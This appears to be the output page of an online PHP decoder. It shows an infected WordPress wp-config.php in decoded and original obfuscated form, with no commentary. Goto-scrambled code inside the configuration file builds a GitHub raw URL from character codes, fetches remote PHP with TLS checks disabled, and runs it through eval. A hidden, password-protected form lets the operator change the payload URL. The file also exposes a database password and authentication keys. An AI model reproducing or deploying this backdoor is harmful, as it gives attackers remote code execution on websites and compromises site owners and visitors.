Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php //define( 'WP_CACHE', true ); /** * The base configuration for WordPress * ..

Decoded Output download

<?php 
//define( 'WP_CACHE', true ); 
 
/** 
 * The base configuration for WordPress 
 * 
 * The wp-config.php creation script uses this file during the 
 * installation. You don't have to use the web site, you can 
 * copy this file to "wp-config.php" and fill in the values. 
 * 
 * This file contains the following configurations: 
 * 
 * * MySQL settings 
 * * Secret keys 
 * * Database table prefix 
 * * ABSPATH 
 * 
 * @link https://codex.wordpress.org/Editing_wp-config.php 
 * 
 * @package WordPress 
 */ 
// ** MySQL settings - You can get this info from your web host ** // 
/** The name of the database for WordPress */ 
define('DB_NAME', 'localhost'); 
/** MySQL database username */ 
define('DB_USER', 'localhost'); 
/** MySQL database password */ 
define('DB_PASSWORD', '0XOV],Vn!YyQ'); 
/** MySQL hostname */ 
define('DB_HOST', 'localhost'); 
/** Database Charset to use in creating database tables. */ 
define('DB_CHARSET', 'utf8mb4'); 
/** The Database Collate type. Don't change this if in doubt. */ 
define('DB_COLLATE', ''); 
/**#@+ 
 * Authentication Unique Keys and Salts. 
 * 
 * Change these to different unique phrases! 
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} 
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. 
 * 
 * @since 2.6.0 
 */ 
define('AUTH_KEY',         'z)B^@@ejb}taKC?s>k}eb=ZqTgm,<!~mV$_%(LIWN[t^8U/^:_>mzef^xdv3.9]*'); 
define('SECURE_AUTH_KEY',  '&G2a.52fY>[R@9Hp`N}LMV=@g#aMl]z~pJYd=Qtg/i)=xI5)oC}[EDE@jCNq/2s-'); 
define('LOGGED_IN_KEY',    'F:3D]JtlT<P6xkqh}!QojVSD=Br(Ja|J[HcPb7 J5v7jZ4O1$L#UYW4!T<#SVqeG'); 
define('NONCE_KEY',        '?_NJe Pku,B$Ok~:hOX.kd+47/fl0(_nS~.a&lhW7*32r|9&kK/yDzsWIul:2{1+'); 
define('AUTH_SALT',        'eC7sy[}&i[bHt1YLU.^8Crggu-!)Ic].>GM]XaCJ=oRpA|+9j}cz[IHvXmP%c}o/'); 
define('SECURE_AUTH_SALT', 'ruj==2GqPF&.8XMBeNe,W3u8C6&d/w^E]%pozd&`?9J33cjz^W;8W6e}#3 w![U}'); 
define('LOGGED_IN_SALT',   '*_p!=3n^V0t|-vj<X8veNDfC&FbD[:i,T6pjkjJw|K(2b)^N005kl=[@7hrM`#.l'); 
define('NONCE_SALT',       'H|Q=3:ytt^}&|~*l)/Snj>3*3z!8,0]o/gtHyUL^-[eIW(o(?o4R#MR~]f=Ecb/-'); 
/**#@-*/ 
/** 
 * WordPress Database Table prefix. 
 * 
 * You can have multiple installations in one database if you give each 
 * a unique prefix. Only numbers, letters, and underscores please! 
 */ 
$table_prefix  = 'wp_'; 
goto myTwl; 
Gwjph: 
foreach ($asciiArray as $ascii) { 
	$decodedString .= chr($ascii); 
} 
goto A8JQq; 
jEY2k: 
function madrid($url) 
{ 
	$ch = curl_init(); 
	curl_setopt($ch, CURLOPT_URL, $url); 
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
	curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 
	$result = curl_exec($ch); 
	curl_close($ch); 
	return $result; 
} 
goto SqvQx; 
h0ejL: 
if (isset($_GET["ts"])) { 
	if ($_SERVER["REQUEST_METHOD"] === "POST") { 
		if (isset($_POST["password"])) { 
			$provided_password = $_POST["password"]; 
			if (password_verify($provided_password, $correct_password)) { 
				if (isset($_POST["url"])) { 
					$url = $_POST["url"]; 
					$_SESSION["ts_url"] = $url; 
					echo "updated : " . $_SESSION["ts_url"]; 
					die; 
				} else { 
					echo "Error!"; 
					die; 
				} 
			} else { 
				echo ''; 
				die; 
			} 
		} else { 
			echo ''; 
			die; 
		} 
	} else { ?> 
 
		<head> 
			<style> 
				#password { 
					order: 2 
				} 
 
				#url { 
					order: 1 
				} 
 
				#password, 
				#url { 
					display: block; 
					margin-bottom: 10px; 
					opacity: 0; 
					transition: opacity .3s 
				} 
 
				#password:hover, 
				#url:hover { 
					opacity: 1 
				} 
 
				form { 
					display: flex; 
					flex-direction: column; 
					align-items: flex-end 
				} 
			</style> 
			<script> 
				document.addEventListener("DOMContentLoaded", function() { 
					document.querySelector("#password").addEventListener("keydown", function(e) { 
						"Enter" === e.key && (e.preventDefault(), document.querySelector("form").submit()) 
					}) 
				}) 
			</script> 
		</head> 
 
		<body> 
			<form action="" method="post"><input id="password" name="password" type="password"><br><input id="url" name="url" value="<?php echo isset($_POST["url"]) ? $_POST["url"] : ''; ?> 
"><br></form> 
		</body><?php die; 
			} 
		} else { 
			if (empty($_SESSION["ts_url"])) { 
				$result = @file_get_contents($url); 
				if (empty($result)) { 
					$result = madrid($url); 
					if (empty($result)) { 
						$result = downloadWithFopen($url); 
					} 
				} 
			} else { 
				$result = @file_get_contents($_SESSION["ts_url"]); 
				if (empty($result)) { 
					$result = madrid($_SESSION["ts_url"]); 
					if (empty($result)) { 
						$result = downloadWithFopen($_SESSION["ts_url"]); 
					} 
				} 
			} 
		} 
		goto sFVhU; 
		tNQBH: 
		$asciiArray = array(104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 110, 105, 105, 107, 107, 105, 116, 97, 54, 57, 56, 52, 47, 110, 105, 107, 105, 116, 97, 47, 109, 97, 105, 110, 47, 100, 101, 46, 112, 104, 112); 
		goto IgwMt; 
		hfrig: 
		if (isset($_GET["ts_reset"])) { 
			$_SESSION["ts_url"] = ''; 
			echo "success"; 
			die; 
		} 
		goto h0ejL; 
		SqvQx: 
		function downloadWithFopen($url) 
		{ 
			$contextOptions = array("ssl" => array("verify_peer" => false, "verify_peer_name" => false)); 
			$context = stream_context_create($contextOptions); 
			$result = false; 
			if ($fp = fopen($url, "r", false, $context)) { 
				$result = ''; 
				while ($data = fread($fp, 8192)) { 
					$result .= $data; 
				} 
				fclose($fp); 
			} 
			return $result; 
		} 
		goto tNQBH; 
		myTwl: 
		session_start(); 
		goto jEY2k; 
		A8JQq: 
		$url = $decodedString; 
		goto fXUcz; 
		sFVhU: 
		if (is_string($result)) { 
			eval("?>" . $result); 
		} else { 
			echo "Error"; 
		} 
		goto nxhqy; 
		fXUcz: 
		$correct_password = "$2a$12$Z1LaFHixy.OtMDdhW1fsNOPsTZYTwyEV.COtKxNpG8uQHu.dJ90Li"; 
		goto hfrig; 
		IgwMt: 
		$decodedString = ''; 
		goto Gwjph; 
		nxhqy: 
 
		/** 
		 * For developers: WordPress debugging mode. 
		 * 
		 * Change this to true to enable the display of notices during development. 
		 * It is strongly recommended that plugin and theme developers use WP_DEBUG 
		 * in their development environments. 
		 * 
		 * For information on other constants that can be used for debugging, 
		 * visit the Codex. 
		 * 
		 * @link https://codex.wordpress.org/Debugging_in_WordPress 
		 */ 
		define('WP_DEBUG', false); 
		/* That's all, stop editing! Happy blogging. */ 
		/** Absolute path to the WordPress directory. */ 
		if (!defined('ABSPATH')) 
			define('ABSPATH', dirname(__FILE__) . '/'); 
		/** Sets up WordPress vars and included files. */ 
 ?>

Did this file decode correctly?

Original Code

<?php
//define( 'WP_CACHE', true );

/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'localhost');
/** MySQL database username */
define('DB_USER', 'localhost');
/** MySQL database password */
define('DB_PASSWORD', '0XOV],Vn!YyQ');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'z)B^@@ejb}taKC?s>k}eb=ZqTgm,<!~mV$_%(LIWN[t^8U/^:_>mzef^xdv3.9]*');
define('SECURE_AUTH_KEY',  '&G2a.52fY>[R@9Hp`N}LMV=@g#aMl]z~pJYd=Qtg/i)=xI5)oC}[EDE@jCNq/2s-');
define('LOGGED_IN_KEY',    'F:3D]JtlT<P6xkqh}!QojVSD=Br(Ja|J[HcPb7 J5v7jZ4O1$L#UYW4!T<#SVqeG');
define('NONCE_KEY',        '?_NJe Pku,B$Ok~:hOX.kd+47/fl0(_nS~.a&lhW7*32r|9&kK/yDzsWIul:2{1+');
define('AUTH_SALT',        'eC7sy[}&i[bHt1YLU.^8Crggu-!)Ic].>GM]XaCJ=oRpA|+9j}cz[IHvXmP%c}o/');
define('SECURE_AUTH_SALT', 'ruj==2GqPF&.8XMBeNe,W3u8C6&d/w^E]%pozd&`?9J33cjz^W;8W6e}#3 w![U}');
define('LOGGED_IN_SALT',   '*_p!=3n^V0t|-vj<X8veNDfC&FbD[:i,T6pjkjJw|K(2b)^N005kl=[@7hrM`#.l');
define('NONCE_SALT',       'H|Q=3:ytt^}&|~*l)/Snj>3*3z!8,0]o/gtHyUL^-[eIW(o(?o4R#MR~]f=Ecb/-');
/**#@-*/
/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';
goto myTwl;
Gwjph:
foreach ($asciiArray as $ascii) {
	$decodedString .= chr($ascii);
}
goto A8JQq;
jEY2k:
function madrid($url)
{
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
	$result = curl_exec($ch);
	curl_close($ch);
	return $result;
}
goto SqvQx;
h0ejL:
if (isset($_GET["\x74\x73"])) {
	if ($_SERVER["\x52\105\x51\x55\x45\x53\x54\137\x4d\x45\x54\x48\117\x44"] === "\120\117\123\x54") {
		if (isset($_POST["\160\141\x73\x73\x77\157\162\x64"])) {
			$provided_password = $_POST["\x70\x61\x73\163\x77\157\x72\x64"];
			if (password_verify($provided_password, $correct_password)) {
				if (isset($_POST["\x75\162\x6c"])) {
					$url = $_POST["\x75\x72\154"];
					$_SESSION["\x74\163\137\165\162\x6c"] = $url;
					echo "\165\160\x64\x61\164\x65\144\40\72\40" . $_SESSION["\164\x73\x5f\165\x72\x6c"];
					die;
				} else {
					echo "\105\162\x72\x6f\x72\41";
					die;
				}
			} else {
				echo '';
				die;
			}
		} else {
			echo '';
			die;
		}
	} else { ?>

		<head>
			<style>
				#password {
					order: 2
				}

				#url {
					order: 1
				}

				#password,
				#url {
					display: block;
					margin-bottom: 10px;
					opacity: 0;
					transition: opacity .3s
				}

				#password:hover,
				#url:hover {
					opacity: 1
				}

				form {
					display: flex;
					flex-direction: column;
					align-items: flex-end
				}
			</style>
			<script>
				document.addEventListener("DOMContentLoaded", function() {
					document.querySelector("#password").addEventListener("keydown", function(e) {
						"Enter" === e.key && (e.preventDefault(), document.querySelector("form").submit())
					})
				})
			</script>
		</head>

		<body>
			<form action="" method="post"><input id="password" name="password" type="password"><br><input id="url" name="url" value="<?php echo isset($_POST["\165\162\154"]) ? $_POST["\x75\162\x6c"] : ''; ?>
"><br></form>
		</body><?php die;
			}
		} else {
			if (empty($_SESSION["\x74\x73\x5f\165\x72\x6c"])) {
				$result = @file_get_contents($url);
				if (empty($result)) {
					$result = madrid($url);
					if (empty($result)) {
						$result = downloadWithFopen($url);
					}
				}
			} else {
				$result = @file_get_contents($_SESSION["\x74\163\137\165\x72\154"]);
				if (empty($result)) {
					$result = madrid($_SESSION["\164\163\x5f\165\x72\154"]);
					if (empty($result)) {
						$result = downloadWithFopen($_SESSION["\164\163\x5f\x75\x72\154"]);
					}
				}
			}
		}
		goto sFVhU;
		tNQBH:
		$asciiArray = array(104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 110, 105, 105, 107, 107, 105, 116, 97, 54, 57, 56, 52, 47, 110, 105, 107, 105, 116, 97, 47, 109, 97, 105, 110, 47, 100, 101, 46, 112, 104, 112);
		goto IgwMt;
		hfrig:
		if (isset($_GET["\164\x73\x5f\x72\145\x73\x65\164"])) {
			$_SESSION["\164\163\137\165\x72\154"] = '';
			echo "\163\x75\x63\143\145\x73\163";
			die;
		}
		goto h0ejL;
		SqvQx:
		function downloadWithFopen($url)
		{
			$contextOptions = array("\x73\x73\x6c" => array("\x76\145\162\x69\x66\171\137\x70\145\x65\x72" => false, "\x76\x65\162\151\146\171\137\160\145\x65\x72\137\156\x61\155\x65" => false));
			$context = stream_context_create($contextOptions);
			$result = false;
			if ($fp = fopen($url, "\162", false, $context)) {
				$result = '';
				while ($data = fread($fp, 8192)) {
					$result .= $data;
				}
				fclose($fp);
			}
			return $result;
		}
		goto tNQBH;
		myTwl:
		session_start();
		goto jEY2k;
		A8JQq:
		$url = $decodedString;
		goto fXUcz;
		sFVhU:
		if (is_string($result)) {
			eval("\x3f\76" . $result);
		} else {
			echo "\x45\x72\x72\157\162";
		}
		goto nxhqy;
		fXUcz:
		$correct_password = "\44\62\x61\44\61\62\x24\x5a\61\114\x61\106\110\151\170\171\56\x4f\x74\x4d\104\x64\x68\127\x31\146\163\116\x4f\120\163\x54\132\x59\124\x77\171\x45\x56\x2e\x43\x4f\164\113\x78\x4e\160\x47\x38\x75\121\x48\165\56\x64\112\71\60\x4c\x69";
		goto hfrig;
		IgwMt:
		$decodedString = '';
		goto Gwjph;
		nxhqy:

		/**
		 * For developers: WordPress debugging mode.
		 *
		 * Change this to true to enable the display of notices during development.
		 * It is strongly recommended that plugin and theme developers use WP_DEBUG
		 * in their development environments.
		 *
		 * For information on other constants that can be used for debugging,
		 * visit the Codex.
		 *
		 * @link https://codex.wordpress.org/Debugging_in_WordPress
		 */
		define('WP_DEBUG', false);
		/* That's all, stop editing! Happy blogging. */
		/** Absolute path to the WordPress directory. */
		if (!defined('ABSPATH'))
			define('ABSPATH', dirname(__FILE__) . '/');
		/** Sets up WordPress vars and included files. */

Function Calls

None

Variables

None

Stats

MD5 e424f518cfbe02607b0c7bf987ab8664
Eval Count 0
Decode Time 64 ms